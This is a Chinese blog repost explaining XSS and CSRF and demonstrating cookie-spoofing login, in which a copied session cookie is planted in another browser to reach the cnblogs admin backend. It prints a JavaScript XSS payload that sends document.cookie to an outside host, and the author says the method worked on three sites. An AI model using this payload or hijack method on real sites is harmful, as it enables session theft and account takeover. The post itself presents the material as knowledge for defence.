通过COOKIE欺骗登录网站后台
1.今天闲着没事看了看关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)的知识,xss表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻击中,通过插入恶意脚本,实现对用户游览器的控制,CSRF全名是Cross-site request forgery,是一种对网站的恶意利用,CSRF比XSS更具危险性。其实XSS攻击就是网站输入框没有限制非法字符,或者没有对脚本内容进行编码导致的!
var img = document.createElement('img'); img.src='http://www.xss.com?cookie='+document.cookie; img.style.display='none'; document.getElementsByTagName('body')[0].appendChild(img);
比如这段代码,当我们没有对网站输入框进行非法字符的限制的话,用户输入了这段脚本,这样就会神不知鬼不觉的把当前用户的cookie发送给了我的恶意站点,我的恶意站点通过获取get参数就拿到了用户的cookie。当然我们可以通过这个方法拿到用户各种各样的数据。
2.当然我今天说的主要不是这些,而是通过你拿到的cookie,植入到你的浏览器中然后就可以访问网站后台了,下面我来为大家演示一遍,如何通过已存在的Cookie,进入博客园后台,我用IE浏览器和Chrome浏览器来测试!
首先我们通过IE浏览器拿到我们登入博客园后的Cookie,通过IECookiesview插件可以查看到IE浏览器下所有的Cookie信息,然后我们找到cnblogs.com站点下的Cookie,然后复制下.CNBlogsCookie和key和value值,如图所示!
3.众所周知,cookies属于隐私数据,不同浏览器保存在不同地方。不可能共享的,此时我们再次打开Chorme浏览器,如图IE浏览器为登录状态,而chorme浏览器为未登录状态
4.那么此时我们就将刚拷贝的IE浏览器下博客园的cookie数据植入到chrome浏览器中,实现cookie欺骗登录到博客园后台,在chrome浏览器中添加cookies扩展程序,方便写入和删除cookie
5.然后打开cookies插件,我们就找到cnblogs.com下的cookie,默认没有登录的时候是没有.CNBlogsCookie这个cookie的, 然后我们点击添加一个cookie,将.CNBlogsCookie和key和value值写入进去,再刷新网站页面,成功进入博客园网站后台!
6.如果将这个方法,再结合到开始讲的XSS攻击的话获取到别人网站的cookie信息,那么黑进别人网站的后台就很容易了,我自己也试了三个网站,都是可以成功进入的! 当然我说这些不是为了让大家黑别人的网站,只是只有弄懂了这些,才能更好的防范,保证自己开发的网站的安全!
出处:https://www.cnblogs.com/MR-YY/p/5259178.html
关注我】。(●'◡'●)
如果,您希望更容易地发现我的新博客,不妨点击一下绿色通道的【因为,我的写作热情也离不开您的肯定与支持,感谢您的阅读,我是【Jack_孟】!
本文来自博客园,作者:jack_Meng,转载请注明原文链接:https://www.cnblogs.com/mq0036/p/9110710.html
【免责声明】本文来自源于网络,如涉及版权或侵权问题,请及时联系我们,我们将第一时间删除或更改!
posted on 2018-05-30 14:29 jack_Meng 阅读(11407) 评论(0) 编辑 收藏 举报
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 没有源码,如何修改代码逻辑?
· 一个奇形怪状的面试题:Bean中的CHM要不要加volatile?
· [.NET]调用本地 Deepseek 模型
· 一个费力不讨好的项目,让我损失了近一半的绩效!
· .NET Core 托管堆内存泄露/CPU异常的常见思路
· DeepSeek “源神”启动!「GitHub 热点速览」
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· C# 集成 DeepSeek 模型实现 AI 私有化(本地部署与 API 调用教程)
· DeepSeek R1 简明指南:架构、训练、本地部署及硬件要求
· NetPad:一个.NET开源、跨平台的C#编辑器